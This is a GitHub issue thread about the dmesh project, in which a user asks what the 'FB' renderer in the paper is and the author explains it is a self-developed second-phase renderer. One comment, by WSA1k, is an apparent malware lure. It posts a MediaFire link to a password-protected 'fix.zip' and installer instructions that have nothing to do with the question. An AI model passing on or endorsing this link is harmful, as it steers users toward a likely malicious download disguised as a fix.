### ISSUE TITLE
What is the renderer FB?

### ISSUE THREAD

**Issue by puhuajiang** [SonSang/dmesh#13]
Thank you for your great work!
In your code, I find soft render and hard render. According to my understand, the soft render is adapted  from 3DGS renderer and the hard renderer is Nvidiffarst.  But in your paper, I find three renderers: FA,FA' and FB, so what is the FB?
Thank you!

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by SonSang** [comment]
Hi, there are two phases in the optimization. In the first phase, as you mentioned, we use two renderers FA and FA’. The renderer FB is used in the second phase, and assumes the point positions and weights are fixed. In this way, we can conduct precise depth ordering between faces efficiently, and remove false inner faces effectively. Please see Appendix of the paper.

**Comment by puhuajiang** [comment]
Thank you for your reply!
So, FB is anothor renderer that you developed by your own? Or based on other paper?

**Comment by SonSang** [comment]
It was developed by ourselves.

**Comment by puhuajiang** [comment]
Thank you for your time!
